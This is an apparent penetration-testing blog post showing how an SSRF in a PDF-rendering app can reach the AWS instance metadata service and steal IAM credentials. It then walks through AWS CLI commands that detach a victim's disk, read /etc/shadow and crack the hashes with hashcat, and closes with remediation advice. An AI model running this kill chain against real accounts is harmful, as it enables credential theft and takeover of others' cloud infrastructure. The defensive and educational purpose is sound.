When it all goes wrong on AWS – how an SSRF can lead to full control of your EC2 infrastructure
AWS is an incredibly powerful cloud platform that enables businesses to quickly and efficiently deploy a wide range of software and services to end users. This feature-rich environment does of course increase the attack surface that bad actors have to exploit, especially when combined with lax configurations and poorly designed APIs. In this blog post, I’m going to detail how a server-side request forgery (SSRF) vulnerability can be used to steal IAM credentials, and how the overly permissive policies commonly attached to those credentials can then be used to take full control of a business’ EC2 and S3 infrastructure, including employee logins and sensitive customer information. And, as any good pentester would, I’ll show you what we can learn from this, and what my recommendations would be to the hypothetical company, ACME Corp.
The Application
First, a quick overview of the vulnerable application. The screenshot below shows the app’s main functionality, a PDF generator. It takes a URL and renders the page to a PDF, which it then serves to the user. There are two other links: a home page (which is of no interest to us), and a second link labelled _Manage EC2 Loadbalancing_. The second link is interesting because it implies that the box the app is running on acts as some ad-hoc loadbalancer, and can spin up and terminate other EC2 instances. Sadly, when we visit this endpoint, it returns a 401 with no option to log in, so it probably uses IP whitelisting.
Now that we’ve identified an action of interest, we can examine the `url2pdf` page further. While it’s a simple webpage, the very last words on the page scream SSRF – _”Now with support for intranet URLs”_. As a sanity check, we _could_ confirm that it generates PDFs for `http://localhost/url2pdf`, but for the sake of brevity I’m going to just assume it’s vulnerable and go right into the exploit.
The Exploit
If we examine the EC2 documentation[^1], we find that there exists an API called the Instance Metadata Service (`IMDS`), which exposes the IAM security credentials of the current EC2 instance through the endpoints `iam/info` and `iam/security-credentials/`_`role-name`_.
For the uninitiated, AWS has what’s called Identity and Access Management (IAM) roles, which allow for the delegation of granular authentication (who is making the request) and authorization (what they’re allowed to do) to different entities (either AWS services, programs that interact with AWS, or other humans). The authentication is provided by IAM credentials, which are usually either an Account ID and console password, or a set of access keys. The authorization is provided through policies, which are collections of actions that an associated IAM role is allowed to perform, such as StartInstances, StopInstances, CreateBucket, PutObject, etc. All AWS services have actions associated with them; the previous examples were of EC2 and S3.
The Instance Metadata Service has two versions, IMDSv1 and IMDSv2, both of which are enabled by default. As per the documentation, version 1 of the API can be queried with a simple GET request, as shown below.
curl http://169.254.169.254/latest/meta-data/
While there are many other interesting things we can examine and configure, of particular interest are the endpoints mentioned above, `iam/info` and `iam/security-credentials/`_`role-name`_.
We first exploit the SSRF vulnerability to render the `iam/info` endpoint and get the role name, which in this case is `ManagementEC2Role`. With this, we can steal the actual credentials of the IAM role, as seen below.
As you can see, the endpoint returns the unencrypted credentials of the corresponding IAM role.
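For clarity, here’s a minimal sketch of the two metadata requests the SSRF performs on the instance’s behalf, shown as direct curl commands; in practice, these URLs are simply submitted to the url2pdf form and the responses come back rendered in the PDF.
# Returns the instance profile information, from which we learn the role name (ManagementEC2Role)
curl http://169.254.169.254/latest/meta-data/iam/info
# Returns the temporary access key, secret key, and session token for that role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ManagementEC2Role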
The Kill Chain
From here, we can do anything the IAM role can. Since we don’t know the actual policies attached to the instance, it’s a bit of guesswork. However, the box likely acts as an ad-hoc EC2 load balancer, so we’ll try a couple of EC2 and S3 actions and work through an example kill chain.
Our end goal is going to be pulling all the password hashes of the employees on the current EC2 instance. To achieve this, we’re going to create an instance with ssh keys that we control, stop the victim EC2 instance, detach its filesystem (called a volume in EC2), and attach it to the instance we control. We do, however, have to ensure our new instance is in the same availability zone as the victim instance, otherwise we can’t attach the volume.
First, we are going to load the access keys into environment variables for the AWS CLI tool.
export AWS_ACCESS_KEY_ID=ASIAYBXI6FGVDSWUPSMX
export AWS_SECRET_ACCESS_KEY=AhfNrgJNfkoXEMrjfE50f51ORkCbUMg7XJ3l2OFU
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEEEaCXVzLWVhc3QtMiJIMEYCIQC...
Next, we are going to create the ssh keypair and save the private key (the name doesn’t really matter).
aws ec2 create-key-pair --key-name my-key-pair52431 --query "KeyMaterial" --output text > privatekey.pem
chmod 400 privatekey.pem
We then query the volumes, taking note of the volume ID and the availability zone it’s in.
% aws ec2 describe-volumes
VOLUMES us-east-2b ... vol-0c3ae4bf35679953c
ATTACHMENTS ... i-0771cfc10e67653c7 attached vol-0c3ae4bf35679953c
With this information we can create an EC2 instance with our keypair in the same availability zone as the victim. I’ve used the Ubuntu instance image since it’s in the free tier.
% aws ec2 run-instances --instance-type t2.micro \
--image-id ami-00399ec92321828f5 \
--key-name my-key-pair52431 \
--region us-east-2 \
--placement AvailabilityZone=us-east-2b
553465555370 r-046c82682e525109e
From here, we can stop the victim, and attach its filesystem to the instance we control.
% aws ec2 stop-instances --instance-ids i-0771cfc10e67653c7
STOPPINGINSTANCES i-0771cfc10e67653c7
CURRENTSTATE 64 stopping
PREVIOUSSTATE 16 running
% aws ec2 detach-volume --volume-id vol-0c3ae4bf35679953c
2021-05-13T01:48:19.000Z /dev/sda1 i-0771cfc10e67653c7 detaching vol-0c3ae4bf35679953c
% aws ec2 attach-volume --device /dev/sdz --instance-id i-0f39381f5882c8632 --volume-id vol-0c3ae4bf35679953c
2021-05-13T02:07:49.762Z /dev/sdz i-0f39381f5882c8632 attaching vol-0c3ae4bf35679953c
Then, we simply get the IP address of our new instance, ssh into it, and pull all the hashes.
% aws ec2 describe-instances --instance-ids i-0f39381f5882c8632
...
INSTANCES ... 18.217.153.36 ...
...
% ssh [email protected] -i privatekey.pem
ubuntu@ip-172-31-24-55:~$ sudo mount /dev/xvdz1 /mnt
ubuntu@ip-172-31-24-55:~$ sudo cat /mnt/etc/shadow
root:$6$XbMFNhvmHgLqH7Br$3pEsbmFdSS2s6D3NHwURbqtD6GCMcn6wtpzKZYYS0glBOUFU27axVzBZF4OF/MBKu0W1O9Jx.roxEec3lmlki1:18747:0:99999:7:::
...
alice:$6$tA7Qdo3MXAD6FZa/$XHl1SezRO1Pz0ZV5F54ZGg2IXaim4WYbKuEUF62Ku.RF/.KXejM5CNJtWWwyLJLCLLBkNkBIwtfQGAM7Yeq0t.:18728:0:99999:7:::
bob:$6$biAdYPwVDPuUp7F6$c/ApI93HJE.LKHdGt4GXkXxHXnynbDOKPPcg780jgdWfiSqy.hjxSlCFUfZy9ztk/Ts1nZKUNHKNGdVRweUWP/:1881320:99999:7:::
neil:$6$dp7.Ix6473dRLPvu$AE.aAPtzK0JoOF93K6xst/DHO0k0s7F2FHq7p1hRLQWRo6m30MysMYLP6leUPlGvRVnLTb06Qtf.t/I9rUZ8Y1:18324:0:99999:7:::
ubuntu:$6$gQspv5IJlul7gXQF$V6nj6Fhwg611ojVD8eTzvOh3UKsHTz/THftJj0Ts6jG4ZcwseajoOIvu71KKLbp5FkzQtrK7v23RDFz7W9Jjr.:18712:0:99999:7:::
Cracking these hashes is left as an exercise for the reader.
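For those who want a starting point, here’s a minimal sketch of a wordlist attack; the `$6$` prefix indicates sha512crypt, and the file names below are placeholders.
# Mode 1800 is sha512crypt ($6$...); hashes.txt holds just the hash field from each shadow entry
hashcat -m 1800 -a 0 hashes.txt rockyou.txt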
The Consequences
The possibilities of this attack are endless. With full control of EC2 instances, an actor could carry out any number of high-severity attacks:
- DoS and take down services
- Inject arbitrary data into what you serve to customers
- Use your infrastructure for nefarious purposes (host C2, host illegal content, attack from your IPs)
- Pull all user and administrator hashes from an AD domain controller
- Steal confidential intellectual property/trade secrets
- Leak customer information including passwords
In fact, in 2019 this exact exploit was used to steal the user data of more than 100 million users from Capital One[^2].
The Analysis
So what went wrong? Other than the SSRF vulnerability, there are a number of poor design choices and common misconfigurations that allowed this attack to be as serious as it was.
The first is that IMDSv1 is poorly designed but still enabled by default. AWS was the last of the big three cloud providers to add session-based metadata retrieval, which IMDSv2 provides, as shown below.
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
As you can see, IMDSv2 requires the use of a less common HTTP method (PUT) to retrieve a token, which eventually expires, and every subsequent request must then present that token in a custom header. These mitigations make it much harder for SSRF and XXE vulnerabilities to be leveraged into this exploit.
Additionally, the IAM role’s policies are too permissive. Even though the EC2 instance was used as a load balancer, the attaching and detaching of volumes wasn’t needed to perform its duties. In fact, the two policies attached to it looked like this:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "ec2:*",
            "Resource": "*"
        }
    ]
}
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
This is actually a pretty common misconfiguration. Time is money; creating a well-thought-out policy takes time and knowledge, so it’s often quicker and easier to just allow all actions on all resources. However, there are serious dangers associated with allowing all actions of an AWS service. With `s3:*` on all resources, an actor (or even a rogue employee) has total control of all your cloud storage. As shown above, `ec2:*` on all EC2 resources gives control over all EC2 instances, and the attached filesystems. If a policy has `cloudwatch:*` as the action, the IAM role can access and delete any security logs and alarms set up to protect your AWS infrastructure, allowing an attacker to go undetected.
Each of these poses a threat to the security and integrity of your AWS infrastructure.
The Defence
We can adopt a defence-in-depth strategy to mitigate the risk of this attack occurring on our AWS infrastructure.
Firstly, we can disable IMDSv1. See the AWS IMDS documentation[^3] for more info.
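As a concrete sketch, requiring IMDSv2 on an existing instance (which effectively disables IMDSv1) can be done through the CLI; the instance ID below is a placeholder.
# Require session tokens (IMDSv2) on the metadata endpoint; plain IMDSv1 GETs will then be refused
aws ec2 modify-instance-metadata-options \
    --instance-id i-0123456789abcdef0 \
    --http-tokens required \
    --http-endpoint enabled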
Next, we design the IAM policies to be as restrictive as possible without affecting the functionality of the application, also known as the principle of least privilege. Of course, this takes time to develop, and therefore additional development cost, but is ultimately worth it. See the IAM best practices[^4] for more info.
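To illustrate, a tighter policy for our ad-hoc load balancer might look something like the sketch below. The exact action list is an assumption about what the application actually needs, and in a real deployment the resources should be scoped with ARNs or conditions rather than left as a wildcard.
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "ec2:DescribeInstances",
                "ec2:RunInstances",
                "ec2:StartInstances",
                "ec2:StopInstances",
                "ec2:TerminateInstances"
            ],
            "Resource": "*"
        }
    ]
}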
Another best practice measure is to enable multi-factor authentication on all IAM users. While it won’t prevent this attack – we steal temporary STS credentials and not the full IAM access keys – it will make using leaked long-term IAM credentials much harder, as an actor also needs the second factor. This can be an authenticator app like Google Authenticator, a third-party time-based OTP token, or, for the AWS web console, a YubiKey.
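As a rough sketch, a virtual MFA device can be created and attached to an IAM user from the CLI; the user name, device name, account ID, and one-time codes below are all placeholders.
# Create a virtual MFA device and save the QR code used to seed an authenticator app
aws iam create-virtual-mfa-device \
    --virtual-mfa-device-name alice-mfa \
    --outfile alice-mfa-qr.png \
    --bootstrap-method QRCodePNG
# Attach the device to the user, proving possession with two consecutive OTP codes
aws iam enable-mfa-device \
    --user-name alice \
    --serial-number arn:aws:iam::123456789012:mfa/alice-mfa \
    --authentication-code1 123456 \
    --authentication-code2 654321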
Finally, we can enable CloudWatch to monitor and log AWS actions. This is very infrastructure specific, so see the CloudWatch documentation[^5] for more info.
Footnotes
[^1]: [Instance metadata and user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
[^2]: [Capital One Data Breach](https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/)
[^3]: [IMDS documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html#configuring-instance-metadata-options)
[^4]: [IAM Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html#grant-least-privilege)
[^5]: [What is Amazon CloudWatch?](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html)